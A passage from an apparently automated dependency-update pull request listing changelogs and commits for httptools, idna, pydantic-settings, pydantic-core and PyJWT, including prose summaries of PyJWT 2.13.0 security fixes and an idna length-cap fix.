href=\"https://github.com/MagicStack/httptools/commit/05e6b8e9cf71fed8fa0e4796a2c1a52351b2e182\"\u003e\u003ccode\u003e05e6b8e\u003c/code\u003e\u003c/a\u003e ci: add freethreading 3.14 to the CI matrix (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/146\"\u003e#146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/e3e8d71ee946937209aa965400cc2a8710520215\"\u003e\u003ccode\u003ee3e8d71\u003c/code\u003e\u003c/a\u003e Bump llhttp to 9.4.1 (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/145\"\u003e#145\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/a9bda0edb93da51c68cbf6db791c958166b86249\"\u003e\u003ccode\u003ea9bda0e\u003c/code\u003e\u003c/a\u003e Fix all typing issues (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/134\"\u003e#134\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/28d1db15eaeaab5bc7d376d2c2035d966b6e1378\"\u003e\u003ccode\u003e28d1db1\u003c/code\u003e\u003c/a\u003e mark cython module as free-threading compatible (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/139\"\u003e#139\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/c403ad1ad6cc9345834269a0611b74c6ee4bdcfa\"\u003e\u003ccode\u003ec403ad1\u003c/code\u003e\u003c/a\u003e Allow building with latest setuptools (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/138\"\u003e#138\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/c398a1579a30ba12b5aeed2d7163644947514590\"\u003e\u003ccode\u003ec398a15\u003c/code\u003e\u003c/a\u003e Add http-parser and llhttp licenses into the wheels (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/135\"\u003e#135\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/4cfdabd31ccfd5ccf9ab8c60992b4348ebcf5a84\"\u003e\u003ccode\u003e4cfdabd\u003c/code\u003e\u003c/a\u003e ci: fix release workflow (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/132\"\u003e#132\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/ef71da977cde416fcbd570393fe0c1e22d26b56f\"\u003e\u003ccode\u003eef71da9\u003c/code\u003e\u003c/a\u003e Post-release version bump\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/MagicStack/httptools/compare/v0.7.1...v0.8.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `idna` from 3.13 to 3.17\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/blob/master/HISTORY.md\"\u003eidna's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.17 (2026-05-28)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSubstantial 75% reduction in memory usage through new data\nstructures and some optimization in processing speed.\u003c/li\u003e\n\u003cli\u003eAdded a general 1024-character input length cap to the public\nvalidation, conversion, and codec entry points. This is well above\nany legitimate domain or label and guards against pathological\ninputs.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.16 (2026-05-22)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd a command-line interface (\u003ccode\u003epython -m idna\u003c/code\u003e, also available as\nthe \u003ccode\u003eidna\u003c/code\u003e script). Encodes or decodes one or more domains supplied\nas arguments or on standard input, with options to select A-label\nor U-label output and control error handling.\u003c/li\u003e\n\u003cli\u003eRaise the minimum supported Python version to 3.9\u003c/li\u003e\n\u003cli\u003eVarious code quality improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.15 (2026-05-12)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnforce DNS-length cap on individual labels early in \u003ccode\u003echeck_label\u003c/code\u003e,\nshort-circuiting contextual-rule processing for oversized input\nwhile staying compatible with UTS 46 usage.\u003c/li\u003e\n\u003cli\u003eTidy core helpers: hoist bidi category sets to module-level\nfrozensets (avoiding per-codepoint list construction), simplify\nlength checks, and reuse the shared \u003ccode\u003e_unicode_dots_re\u003c/code\u003e from\n\u003ccode\u003eidna.core\u003c/code\u003e in the codec module.\u003c/li\u003e\n\u003cli\u003eUse \u003ccode\u003eraise ... from err\u003c/code\u003e for proper exception chaining and\nswitch internal string formatting to f-strings.\u003c/li\u003e\n\u003cli\u003eAllow \u003ccode\u003eflit_core\u003c/code\u003e 4.x in the build backend.\u003c/li\u003e\n\u003cli\u003eExpand the ruff lint set (flake8-bugbear, flake8-simplify,\npyupgrade, perflint) and apply the surfaced fixes; pin lint CI\nto Python 3.14.\u003c/li\u003e\n\u003cli\u003eAdd Dependabot configuration for GitHub Actions.\u003c/li\u003e\n\u003cli\u003eConvert README and HISTORY from reStructuredText to Markdown.\u003c/li\u003e\n\u003cli\u003eReference CVE-2026-45409 for the 3.14 advisory in place of the\ninitial GHSA identifier.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Felix Yan, Stan Ulbrych, and metsw24-max for\ncontributions to this release.\u003c/p\u003e\n\u003ch2\u003e3.14 (2026-05-10)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRemoved opportunity to process long inputs into quadratic\ntime by rejecting oversize inputs up-front. Closes a bypass\nof the CVE-2024-3651 mitigation. [CVE-2026-45409]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Stan Ulbrych for reporting the issue.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/f48619c4cea6859b938d560fdd9feb898e678567\"\u003e\u003ccode\u003ef48619c\u003c/code\u003e\u003c/a\u003e Release 3.17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/7421ba8003227f816142ab40178e3a7d204e6847\"\u003e\u003ccode\u003e7421ba8\u003c/code\u003e\u003c/a\u003e Pre-release 3.17rc0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/22ebb73b164081f209449b50162eb7ce086e96a4\"\u003e\u003ccode\u003e22ebb73\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/251\"\u003e#251\u003c/a\u003e from kjd/structure-optimizations\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/2a7ac0a58c788d50112a5003af545a83807fb108\"\u003e\u003ccode\u003e2a7ac0a\u003c/code\u003e\u003c/a\u003e Drop redundant parallel-arrays comment from uts46data\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/354eee9850a7b2962b65ae02010f7ebd9c99b7ed\"\u003e\u003ccode\u003e354eee9\u003c/code\u003e\u003c/a\u003e Apply ruff format to uts46data.py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/8c34ffcab603b4a7a727d4e286b1f3342813281d\"\u003e\u003ccode\u003e8c34ffc\u003c/code\u003e\u003c/a\u003e Refactor uts46data into parallel arrays\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1189629e8a319f7c2b4678b5716c180ebd97de03\"\u003e\u003ccode\u003e1189629\u003c/code\u003e\u003c/a\u003e Range-encode joining_types for compact representation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/f90b87adc6b6b2a591dfc7fb3f8e47870dc81722\"\u003e\u003ccode\u003ef90b87a\u003c/code\u003e\u003c/a\u003e Generic length limit for functions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/d6ffd28be164dfbd3ebca8b3396e39d191f4909b\"\u003e\u003ccode\u003ed6ffd28\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/247\"\u003e#247\u003c/a\u003e from kjd/release-3.16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/6d1a0de52a8b4690f1b2a89829aa85ff1de3635a\"\u003e\u003ccode\u003e6d1a0de\u003c/code\u003e\u003c/a\u003e Release 3.16\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/kjd/idna/compare/v3.13...v3.17\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pydantic-settings` from 2.14.0 to 2.14.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pydantic/pydantic-settings/releases\"\u003epydantic-settings's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.14.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBump the python-packages group with 4 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/850\"\u003epydantic/pydantic-settings#850\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the python-packages group with 5 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/854\"\u003epydantic/pydantic-settings#854\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the github-actions group with 3 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/853\"\u003epydantic/pydantic-settings#853\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the python-packages group with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/856\"\u003epydantic/pydantic-settings#856\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix field named \u003ccode\u003ecls\u003c/code\u003e conflicting with classmethod parameter by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/858\"\u003epydantic/pydantic-settings#858\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePrepare release 2.14.1 by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/859\"\u003epydantic/pydantic-settings#859\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pydantic/pydantic-settings/compare/v2.14.0...v2.14.1\"\u003ehttps://github.com/pydantic/pydantic-settings/compare/v2.14.0...v2.14.1\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/e95c30bec8cfaee88ee275138c064aea97a25bdf\"\u003e\u003ccode\u003ee95c30b\u003c/code\u003e\u003c/a\u003e Prepare release 2.14.1 (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/859\"\u003e#859\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/0c8734581b6cf70a995afad603ac456631d00621\"\u003e\u003ccode\u003e0c87345\u003c/code\u003e\u003c/a\u003e Fix field named \u003ccode\u003ecls\u003c/code\u003e conflicting with classmethod parameter (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/858\"\u003e#858\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/7bd0072795a800065b42210b6dca90fc9b83daf7\"\u003e\u003ccode\u003e7bd0072\u003c/code\u003e\u003c/a\u003e Bump the python-packages group with 2 updates (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/856\"\u003e#856\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/b03e573d017ed48e1c2774a5e0b715db9766c76b\"\u003e\u003ccode\u003eb03e573\u003c/code\u003e\u003c/a\u003e Bump the github-actions group with 3 updates (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/853\"\u003e#853\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/eaa3b434938411ec8a3717ea646614561e713f51\"\u003e\u003ccode\u003eeaa3b43\u003c/code\u003e\u003c/a\u003e Bump the python-packages group with 5 updates (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/854\"\u003e#854\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/9f95615c24c6813c1d7d203576581a79cb6d9e8e\"\u003e\u003ccode\u003e9f95615\u003c/code\u003e\u003c/a\u003e Bump the python-packages group with 4 updates (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/850\"\u003e#850\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/pydantic/pydantic-settings/compare/v2.14.0...v2.14.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pydantic-core` from 2.46.4 to 2.47.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/pydantic/pydantic/commits\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pyjwt` from 2.12.1 to 2.13.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/releases\"\u003epyjwt's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.13.0\u003c/h2\u003e\n\u003ch1\u003ePyJWT 2.13.0 — Security Release\u003c/h1\u003e\n\u003cp\u003eThis release bundles five security fixes plus three additional hardening / spec-compliance changes. We recommend all users upgrade.\u003c/p\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\"\u003e\u003ccode\u003eGHSA-xgmm-8j9v-c9wx\u003c/code\u003e\u003c/a\u003e — JWK JSON accepted as HMAC secret (algorithm confusion).\u003c/strong\u003e \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e previously rejected PEM- and SSH-formatted asymmetric keys but did not catch a JWK passed as a raw JSON string. In a verifier configured with both symmetric and asymmetric algorithms in \u003ccode\u003ealgorithms=[…]\u003c/code\u003e and a raw-JSON JWK as the key, an attacker could forge HS256 tokens using the JWK text as the HMAC secret. The guard has been extended to reject any JWK-shaped JSON. \u003cem\u003eReported by \u003ca href=\"https://github.com/aradona91\"\u003e\u003ccode\u003e@​aradona91\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\"\u003e\u003ccode\u003eGHSA-jq35-7prp-9v3f\u003c/code\u003e\u003c/a\u003e — Algorithm allow-list bypass with \u003ccode\u003ePyJWK\u003c/code\u003e / \u003ccode\u003ePyJWKClient\u003c/code\u003e.\u003c/strong\u003e When verifying with a \u003ccode\u003ePyJWK\u003c/code\u003e, the caller's \u003ccode\u003ealgorithms=[…]\u003c/code\u003e allow-list was checked against the token header \u003ccode\u003ealg\u003c/code\u003e as a string only; actual verification used the algorithm bound to the \u003ccode\u003ePyJWK\u003c/code\u003e. An attacker who controlled a registered JWKS key could sign with one algorithm and advertise another on the header. PyJWT now requires the token header \u003ccode\u003ealg\u003c/code\u003e to match the \u003ccode\u003ePyJWK\u003c/code\u003e's algorithm before verification. \u003cem\u003eReported by \u003ca href=\"https://github.com/sushi-gif\"\u003e\u003ccode\u003e@​sushi-gif\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\"\u003e\u003ccode\u003eGHSA-w7vc-732c-9m39\u003c/code\u003e\u003c/a\u003e — DoS via base64 decode of unused payload segment when \u003ccode\u003eb64=false\u003c/code\u003e.\u003c/strong\u003e For detached-payload JWS (\u003ccode\u003eb64=false\u003c/code\u003e), the compact-form payload segment was base64-decoded before being discarded in favor of the caller-supplied \u003ccode\u003edetached_payload\u003c/code\u003e. An attacker could inflate the unused segment to force CPU + memory cost without holding a valid signature. The segment is now required to be empty per RFC 7515 Appendix F, and is no longer decoded. \u003cem\u003eReported by \u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\"\u003e\u003ccode\u003eGHSA-993g-76c3-p5m4\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e accepts non-HTTP(S) URIs.\u003c/strong\u003e \u003ccode\u003ePyJWKClient.fetch_data\u003c/code\u003e passed its URI to \u003ccode\u003eurllib.request.urlopen\u003c/code\u003e, which by default also handles \u003ccode\u003efile://\u003c/code\u003e, \u003ccode\u003eftp://\u003c/code\u003e, and \u003ccode\u003edata:\u003c/code\u003e schemes. An application that fed an attacker-influenced URI into \u003ccode\u003ePyJWKClient\u003c/code\u003e could be coerced into reading local files or reaching other unintended schemes. \u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects any URI whose scheme isn't \u003ccode\u003ehttp\u003c/code\u003e or \u003ccode\u003ehttps\u003c/code\u003e. \u003cem\u003eReported by \u003ca href=\"https://github.com/KEIJOT\"\u003e\u003ccode\u003e@​KEIJOT\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\"\u003e\u003ccode\u003eGHSA-fhv5-28vv-h8m8\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e cache wiped on fetch error.\u003c/strong\u003e A \u003ccode\u003efinally\u003c/code\u003e-block \u003ccode\u003eput(jwk_set=None)\u003c/code\u003e cleared the JWK Set cache whenever a fetch raised, turning a transient JWKS-endpoint outage into application-wide auth failure. The cache write was moved into the success path; transient errors no longer evict valid cached keys. \u003cem\u003eReported by \u003ca href=\"https://github.com/eddieran\"\u003e\u003ccode\u003e@​eddieran\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReject empty HMAC keys outright in \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e with \u003ccode\u003eInvalidKeyError\u003c/code\u003e instead of accepting them with only a warning. Defends against the \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e footgun. \u003cem\u003eThanks to \u003ca href=\"https://github.com/SnailSploit\"\u003e\u003ccode\u003e@​SnailSploit\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/spartan8806\"\u003e\u003ccode\u003e@​spartan8806\u003c/code\u003e\u003c/a\u003e for the reports.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003eForward per-call \u003ccode\u003eoptions\u003c/code\u003e (including \u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e) from \u003ccode\u003ePyJWT.decode\u003c/code\u003e through to \u003ccode\u003ePyJWS._verify_signature\u003c/code\u003e. The option was previously silently dropped between the two layers, so it only took effect when set on the \u003ccode\u003ePyJWT\u003c/code\u003e instance. \u003cem\u003eThanks to \u003ca href=\"https://github.com/WLUB\"\u003e\u003ccode\u003e@​WLUB\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRFC 7797 §3 compliance for \u003ccode\u003eb64=false\u003c/code\u003e:\u003c/strong\u003e the encoder now auto-adds \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e to \u003ccode\u003ecrit\u003c/code\u003e, and the decoder rejects tokens that set \u003ccode\u003eb64=false\u003c/code\u003e without listing it in \u003ccode\u003ecrit\u003c/code\u003e. \u003cem\u003eThanks to \u003ca href=\"https://github.com/MachineLearning-Nerd\"\u003e\u003ccode\u003e@​MachineLearning-Nerd\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanged\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups, by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/1152\"\u003e#1152\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eUpgrade notes\u003c/h2\u003e\n\u003cp\u003eMost fixes are invisible to correctly-configured callers. A few behavioral changes you may encounter:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eEmpty HMAC keys now raise.\u003c/strong\u003e If your app passed \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e or \u003ccode\u003eb\u0026quot;\u0026quot;\u003c/code\u003e as a secret (often via a missing env var, e.g. \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e), \u003ccode\u003eencode\u003c/code\u003e/\u003ccode\u003edecode\u003c/code\u003e will now raise \u003ccode\u003eInvalidKeyError\u003c/code\u003e. This is the intended behavior — fix the configuration.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWK\u003c/code\u003e decoding now requires the token's \u003ccode\u003ealg\u003c/code\u003e to match the JWK's algorithm.\u003c/strong\u003e Previously a mismatch was silently honored if the header \u003ccode\u003ealg\u003c/code\u003e appeared in the allow-list. Tokens that relied on this mismatch will now fail with \u003ccode\u003eInvalidAlgorithmError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects non-HTTP(S) URIs at construction time.\u003c/strong\u003e Tests or dev environments that fetched JWKS from \u003ccode\u003efile://\u003c/code\u003e URIs need to switch to a local HTTP server or load the JWKS by other means (e.g. construct \u003ccode\u003ePyJWKSet.from_dict(...)\u003c/code\u003e directly).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eb64=false\u003c/code\u003e tokens are now strictly RFC 7515 / 7797 compliant.\u003c/strong\u003e Tokens with a non-empty compact-form payload segment, or that omit \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e from \u003ccode\u003ecrit\u003c/code\u003e, will be rejected. PyJWT-produced tokens always satisfy both invariants, so round-trips through PyJWT are unaffected.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e set per-call now takes effect.\u003c/strong\u003e Callers who passed \u003ccode\u003eoptions={\u0026quot;enforce_minimum_key_length\u0026quot;: True}\u003c/code\u003e to \u003ccode\u003ejwt.decode()\u003c/code\u003e previously got no enforcement; they will now get \u003ccode\u003eInvalidKeyError\u003c/code\u003e on undersized keys, as documented.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull changelog:\u003c/strong\u003e \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ehttps://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/blob/master/CHANGELOG.rst\"\u003epyjwt's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003ev2.13.0 \u0026lt;https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u0026gt;\u003c/code\u003e__\u003c/h2\u003e\n\u003cp\u003eSecurity\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject JWK JSON documents passed as raw HMAC secrets in\n  ``HMACAlgorithm.prepare_key`` to close an algorithm-confusion gap that\n  the existing PEM/SSH guard did not cover. Reported by @aradona91 in\n  `GHSA-xgmm-8j9v-c9wx \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\u0026gt;`__.\n- Bind the JWT header ``alg`` to ``PyJWK.algorithm_name`` during\n  verification so the caller's ``algorithms=[...]`` allow-list cannot be\n  bypassed when decoding with a ``PyJWK`` / ``PyJWKClient`` key. Reported\n  by @sushi-gif in `GHSA-jq35-7prp-9v3f \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\u0026gt;`__.\n- Reject non-``http(s)`` URI schemes in ``PyJWKClient`` so attacker-\n  influenced URIs cannot read local files or reach unintended schemes via\n  urllib's default ``file://`` / ``ftp://`` / ``data:`` handlers. Reported\n  by @KEIJOT in `GHSA-993g-76c3-p5m4 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\u0026gt;`__.\n- Preserve the cached JWK Set on fetch errors in ``PyJWKClient.fetch_data``.\n  The previous ``finally``-block ``put(None)`` pattern cleared the cache\n  on any transient outage, turning one bad JWKS request into application-\n  wide auth failure. Reported by @eddieran in `GHSA-fhv5-28vv-h8m8 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\u0026gt;`__.\n- Skip the unconditional base64 decode of the compact-form payload segment\n  when ``b64=false`` is set in the protected header, and require that\n  segment to be empty (RFC 7515 Appendix F detached form). Closes an\n  unauthenticated DoS amplifier. Reported by @thesmartshadow in\n  `GHSA-w7vc-732c-9m39 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\u0026gt;`__.\n\u003cp\u003eFixed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject empty HMAC keys outright in ``HMACAlgorithm.prepare_key`` with\n  ``InvalidKeyError`` instead of accepting them with only a warning.\n  Thanks to @SnailSploit and @spartan8806 for independently flagging the\n  footgun.\n- Forward per-call ``options`` (including ``enforce_minimum_key_length``)\n  from ``PyJWT.decode`` through to ``PyJWS._verify_signature`` so the\n  option actually takes effect when set at the call site rather than only\n  on the ``PyJWT`` instance. Thanks to @WLUB for the report.\n- RFC 7797 §3 compliance for ``b64=false``: the encoder now auto-adds\n  ``\u0026amp;quot;b64\u0026amp;quot;`` to the ``crit`` header parameter, and the decoder rejects\n  tokens that set ``b64=false`` without listing it in ``crit``. Thanks to\n  @MachineLearning-Nerd for the report.\n\nChanged\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and 